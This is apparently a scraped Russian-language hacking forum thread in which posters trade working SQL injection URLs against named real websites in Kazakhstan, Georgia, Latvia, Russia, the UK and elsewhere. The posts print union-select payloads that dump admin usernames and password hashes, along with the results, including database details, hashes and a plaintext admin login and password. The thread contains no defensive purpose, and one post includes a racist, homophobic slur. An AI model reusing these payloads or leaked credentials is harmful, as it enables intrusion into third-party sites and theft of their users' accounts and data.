http://www.trekkingclub.kz/index.php?p=1+union+select+1,2,3,4,5,6,7/* http://www.trekkingclub.kz/index.php?p=1+union+select+1,database(),3,4,5,6,7/* VERSION:4.1.22 USER:tclub@localhost DATABASE:tclub
gtr-gifts.com Code: http://www.gtr-gifts.com/Shop.php?cat=6&subcat=-29+union+select+concat_ws(0x3,version(),user(),database()),2,3,4/* 5.0.45-community-ntimanez_gtr@localhostimanez_gtr Code: http://www.gtr-gifts.com/Shop.php?cat=6&subcat=-29+union+select+concat(user_name,0x3,user_password),2,3,4+from+gtr_admin+limit+0,1/* waynecarling
http://www.pride.ua/index.php?showtopic=-1+union+select+1,concat(name,0x3a3a,member_login_key),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+ibf_members+limit+0,10/* Что-то не брутятся хеши. Mb дабл md5? .....
http://www.poni.lv/?l=2&c=116&sc=-1+union+select+1,2/* http://www.poni.lv/?l=2&c=116&sc=-1+union+select+1,database()/* VERSION: 4.1.20-log USER: poni@localhost DATABASE: poni http://www.poni.lv/?l=2&c=116&sc=-1+union+select+1,2/**/from/**/data/*
http://www.pc-olymp.ru/gymnastik/index.php3?page=-1+union+select+concat(login,0x3a3a,pwd),2,3,4+from+users+limit+0,10/* Жесть! login: admin Password: admin - ЛОЛ! ЛОЛ! ЛОЛ! Админа в жертву неграм-гомосексуалистим!!!!
http://www.gorobzor.ru/articles/view?id=1+union+select+concat(username,0x3a3a,user_password,0x3a3a)+from+forum.users+limit+1,10/* Login Goodman Pass: $H$9j04UOE51YElZky1aSdrq8t8ekKETZ/ Черти, потрудились бы грамотно фреймворк изучить...
www.accuratelimited.com Code: http://www.accuratelimited.com/entry_detail.php?entry_id=-1+union+select+1,2,3,concat_ws(0x3a,id,user_login,user_pass)+from+wp_users&entry_type=insight www.airquality.co.uk Code: http://www.airquality.co.uk/archive/laqm/laqm.php?action=submit&map_name=wmid&la_id=-1+union+select+concat_ws(0x3a,user,password),2,3,4+from+mysql.user www.hanwha.com.tw Code: http://www.hanwha.com.tw/hardware_detail.php?hard_id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database()),6,7,8,9,10,11,12,13,14,15
Автор строк, почему бы не объеденить сообщения в одно, а не постить по 15 раз подряд? http://www.i-veikals.lv/?lapa=prod&group=1+union+select+1,2/*&lang=lv http://www.i-veikals.lv/?lapa=prod&group=1+union+select+1,database()/*&lang=lv http://www.i-veikals.lv/lapa=prod&group=1+union+select+1,table_name/**/from/**/ information_schema.tables/*&lang=lv VERSION: 5.0.22 USER: [email protected] DATABASE: pplhlv_proj http://www.belarus.kz/index.php?p=1+union+select+1,2,3,4,5,6,7/* http://www.belarus.kz/index.php?p=1+union+select+1,database(),3,4,5,6,7/* http://www.belarus.kz/index.php?p=1+union+select+1,2,3,4,5,6,7/**/from/**/news/* VERSION:4.1.22 USER:brlarusbase@localhost DATABASE:belarusbase
Code: http://junior.eurovision-georgia.ge/index.php?lang=eng&topid=3&id=-1+union+select+1,2,3,4,5/* Code: http://imi.ge/index.php?page=movie&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/* Code: http://www.molhsa.ge/index.php?act=full&Id=1274&catId=-1+union+select+1,2,3,4,5,6/*
http://presa.ge/index.php?text=archive&date=-11+union+select+1,2,table_name,4,5,6+from+information_schema.tables-- user: presa_ge@localhost dbname: presa_ge version: 5.0.51 http://presa.ge/index.php?text=archive&date=-11+union+select+1,2,concat_ws(0x3a,id,user_username,user_password,user_group),4,5,6+from+users+-- 44resa.ge:c1ab283404b71a940807009023a764bd:1 P.S. Админку найти не могу..
Qwazar,сорри,я просто,не увидел,Что ты хэшик вытащил...АА...я первее хэш вытащил)) TAbles: presa.ge:c1ab283404b71a940807009023a764bd:[email protected] ****************************************** abs-tech.com http://www.abs-tech.com/admin/ login:w3 password:radium123 Но я там оказался не одним из первых:
Code: _http://politics.internet.ge/stat_relatives.html?date=2008-08-09+99999&stat=13+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12,13/* смело ковыряем)
Code: http://www.hereandnow.ru/index.php?ids=1%20UNION%20SELECT%201,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7%20LIMIT%201,1/*
Code: http://politics.internet.ge/stat_relatives.html?date=2008-08-09+99999&stat=13+union+select+1,2,3,4,user_id,6,7,8,9,10,11,12,13+from+forum.phpbb_users/* Как выяснилось позже..это приватный форум forum. sanet .ge туда доступа нету(